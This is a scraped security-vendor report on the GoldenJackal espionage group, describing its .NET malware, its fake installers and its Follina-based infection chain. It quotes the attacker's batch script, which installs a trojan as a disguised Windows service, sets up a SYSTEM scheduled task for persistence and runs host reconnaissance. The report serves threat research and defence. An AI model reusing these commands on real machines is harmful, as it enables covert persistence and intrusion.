reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87881"><a href="https://securelist.com/category/incidents/">Incidents</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87886"><a href="https://securelist.com/category/research/">Research</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89476"><a href="https://securelist.com/category/malware-reports/">Malware reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89479"><a href="https://securelist.com/category/spam-and-phishing-reports/">Spam and phishing reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89477"><a href="https://securelist.com/category/publications/">Publications</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87882"><a href="https://securelist.com/category/kaspersky-security-bulletin/">Kaspersky Security Bulletin</a> </ul> <li class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-101953"><a href="https://securelist.com/all/">Archive</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87899"><a href="https://securelist.com/tags/">All Tags</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101954"><a href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">APT Logbook</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101955"><a href="https://securelist.com/webinars/">Webinars</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-102687"><a href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Statistics</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87901"><a target="_blank" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Encyclopedia</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87902"><a target="_blank" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Threats descriptions</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-105984"><a href="https://securelist.com/ksb-2021/">KSB 2021</a> <li class="splitter"></li> <li class="parent" data-parent="About Us" data-icon="top-item"><a rel="About Us" href="#"><i class="top-item"></i><span>About Us</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87792"><a href="https://www.kaspersky.com/about/company?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Company</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87968"><a href="https://www.kaspersky.com/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87971"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87796"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87797"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87798"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Sponsorships</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87970"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87793"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Contacts</a> </ul> <li class="parent" data-parent="Partners" data-icon="top-item"><a rel="Partners" href="#"><i class="top-item"></i><span>Partners</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87768"><a href="https://www.kasperskypartners.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Find a Partner</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87769"><a href="https://www.kaspersky.com/partners?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Partner Program</a> </ul> </ul> <div class="background-overlay"></div> </div> <div class="c-page"> <section class="c-block c-block--bg-image c-page-header js-sticky-header" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-01.jpg);"> <div class="o-container-fluid"> <div class="c-page-header__wrapper u-mt-spacer-base-"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md u-mt-spacer-base-"> <a data-element-id="content-menu" href="#" class="c-page-nav-toggle js-main-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> <span class="c-page-nav-toggle__text">Content menu</span> <span class="c-page-nav-toggle__text c-page-nav-toggle__text--active">Close</span> </a> </div> <div class="o-col-6@md"> <form class="c-page-search__form js-main-search-popup js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> </div> <div class="o-col-3@md c-page-header__utilities"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="c-button c-subscribe-modal-toggle js-modal-open"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg><span>Subscribe</span></a> <div class="c-page-header__dropdown-wrapper"> </div> </div> </div> </div> </div> <nav class="c-page-nav c-color--invert"> <div class="o-container-fluid"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md c-page-nav__info"> <div class="c-site-logo__group"> <a data-element-id="content-menu-securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic c-site-logo--sm"></a> <span class="c-site-tagline">by Kaspersky</span> </div> <a data-element-id="content-menu-dark-mode" href="#" class="c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> </div> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-226" class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-99839" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="content-menu-link">APT (Targeted attacks)</a></li> <li id="menu-item-89457" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="content-menu-link">Secure environment (IoT)</a></li> <li id="menu-item-63231" class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="content-menu-link">Mobile threats</a></li> <li id="menu-item-63229" class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="content-menu-link">Financial threats</a></li> <li id="menu-item-89458" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="content-menu-link">Spam and phishing</a></li> <li id="menu-item-99840" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="content-menu-link">Industrial threats</a></li> <li id="menu-item-89465" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="content-menu-link">Web threats</a></li> <li id="menu-item-89459" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="content-menu-link">Vulnerabilities and exploits</a></li> <li id="menu-item-113855" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-230" class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-84158" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="content-menu-link">APT reports</a></li> <li id="menu-item-99841" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="content-menu-link">Malware descriptions</a></li> <li id="menu-item-84160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="content-menu-link">Security Bulletin</a></li> <li id="menu-item-84161" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="content-menu-link">Malware reports</a></li> <li id="menu-item-89460" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="content-menu-link">Spam and phishing reports</a></li> <li id="menu-item-99842" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="content-menu-link">Security technologies</a></li> <li id="menu-item-84165" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="content-menu-link">Research</a></li> <li id="menu-item-84164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="content-menu-link">Publications</a></li> <li id="menu-item-113876" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p id="menu-item-277" class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="content-menu-link">Other sections</a></p> <ul class="sub-menu"> <li id="menu-item-100526" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="content-menu-link">Archive</a></li> <li id="menu-item-57837" class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="content-menu-link">All tags</a></li> <li id="menu-item-101956" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="content-menu-link">Webinars</a></li> <li id="menu-item-101126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">APT Logbook</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Statistics</a></li> <li id="menu-item-86643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Encyclopedia</a></li> <li id="menu-item-58141" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Threats descriptions</a></li> <li id="menu-item-115044" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-115044"><a href="https://securelist.com/ksb-2024/" data-element-id="content-menu-link">KSB 2024</a></li> </ul> </li> </div> </div> </div> </div> </div> </div> </nav> </section> <section class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article class="c-article"> <header class="c-article__header"> <figure class="c-article__figure u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Meet the GoldenJackal APT group. Don&#8217;t expect any howls</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2023-05-23T08:00:02+00:00">23 May 2023</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#jackalcontrol">JackalControl</a></li><ul class='c-list-links'><li><a href="#installer-mode">Installer mode</a></li><ul class='c-list-links'><li><a href="#persistence">Persistence</a></li></ul></ul><li><a href="#jackalsteal">JackalSteal</a></li><li><a href="#jackalworm">JackalWorm</a></li><li><a href="#jackalperinfo">JackalPerInfo</a></li><li><a href="#jackalscreenwatcher">JackalScreenWatcher</a></li><li><a href="#infrastructure">Infrastructure</a></li><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li><li><a href="#conclusions">Conclusions</a></li><li><a href="#indicators-of-compromise">Indicators of compromise</a></li><ul class='c-list-links'><li><a href="#md5-hashes">MD5 hashes</a></li><li><a href="#legitimate-compromised-websites">Legitimate compromised websites</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> </ul> </div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p>GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. Despite the fact that they began their activities years ago, this group is generally unknown and, as far as we know, has not been publicly described.</p> <p>We started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:</p> <ul> <li>control victim machines</li> <li>spread across systems using removable drives</li> <li>exfiltrate certain files from the infected system</li> <li>steal credentials</li> <li>collect information about the local system</li> <li>collect information about users&#8217; web activities</li> <li>take screen captures of the desktop</li> </ul> <p>Based on their toolset and the attacker&#8217;s behaviour, we believe the actor&#8217;s primary motivation is espionage.</p> <h2 id="infection-vectors">Infection vectors</h2> <p>We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.</p> <p>The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business standalone installer. This tool was used in 2020.</p> <p>The other known infection vector was a malicious document that uses the remote template injection technique to download a malicious HTML page, which exploits <a href="https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e" target="_blank" rel="noopener">the Follina vulnerability</a>.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109708" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01.png" alt="Malicious document – first page" width="442" height="356" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01.png 442w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01-300x242.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01-217x175.png 217w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01-370x298.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214756/GoldenJackal_APT_01-348x280.png 348w" sizes="auto, (max-width: 442px) 100vw, 442px" /></a></p> <p style="text-align: center"><strong><em>Malicious document – first page</em></strong></p> <p>The document was named &#8220;Gallery of Officers Who Have Received National And Foreign Awards.docx&#8221; and appears as a legitimate circular distributed to collect information about officers decorated by Pakistan&#8217;s government. It&#8217;s worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.</p> <p>The document was configured to load an external object from a legitimate and compromised website:</p> <p style="text-align: center">hxxps://www.pak-developers[.]net/internal_data/templates/template.html!</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109709" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png" alt="Code snippet used to load the remote resource" width="841" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png 841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-370x58.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-800x126.png 800w" sizes="auto, (max-width: 841px) 100vw, 841px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to load the remote resource</em></strong></p> <p>The remote webpage is a modified version of a public &#8220;<em>Proof of Concept</em>&#8221; to exploit the Follina vulnerability. The original PoC <a href="https://github.com/thalysonsousa/follina/blob/main/teste.html" target="_blank" rel="noopener">is available on GitHub</a>. The attacker replaced the IT_BrowseForFile variable value with the following:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109710" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png" alt="Code snippet used to exploit the Follina vulnerability" width="900" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-370x67.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-800x146.png 800w" sizes="auto, (max-width: 900px) 100vw, 900px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to exploit the Follina vulnerability</em></strong></p> <p>The decoded string is:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109711" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png" alt="Decoded script" width="827" height="50" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png 827w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-300x18.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-768x46.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-370x22.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-800x48.png 800w" sizes="auto, (max-width: 827px) 100vw, 827px" /></a></p> <p style="text-align: center"><em><strong>Decoded script</strong></em></p> <p>The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: &#8220;%Temp%\GoogleUpdateSetup.exe&#8221;. The downloaded file is the JackalControl malware.</p> <p>In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.</p> <div id="crayon-67b40d9467982004885594" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> cmd /c "c:\windows\temp\install.bat &gt; c:\windows\temp\output.txt"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467982004885594-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467982004885594-1"><span class="crayon-i">cmd</span><span class="crayon-h"> </span>/<span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"c:\windows\temp\install.bat &gt; c:\windows\temp\output.txt"</span></div></div></td> </tr> </table> </div> </div><p> The batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system.</p> <div id="crayon-67b40d9467989845621930" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> $temp\\dnf4.exe /q /norestart tasklist sc qc "WEvMngS" sc stop "WEvMngS" sc delete "WEvMngS" sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows Event Manager" type= own start= auto" sc description "WEvMngS" "Provides event-related methods that register routed events." sc start "WEvMngS" schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml "$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM" sc qc "WEvMngS" schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager" tasklist netstat -aon ping -n 1 google.com ipconfig /displaydns netsh winhttp show proxy reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467989845621930-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-4">4</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-6">6</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-8">8</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-10">10</div><div 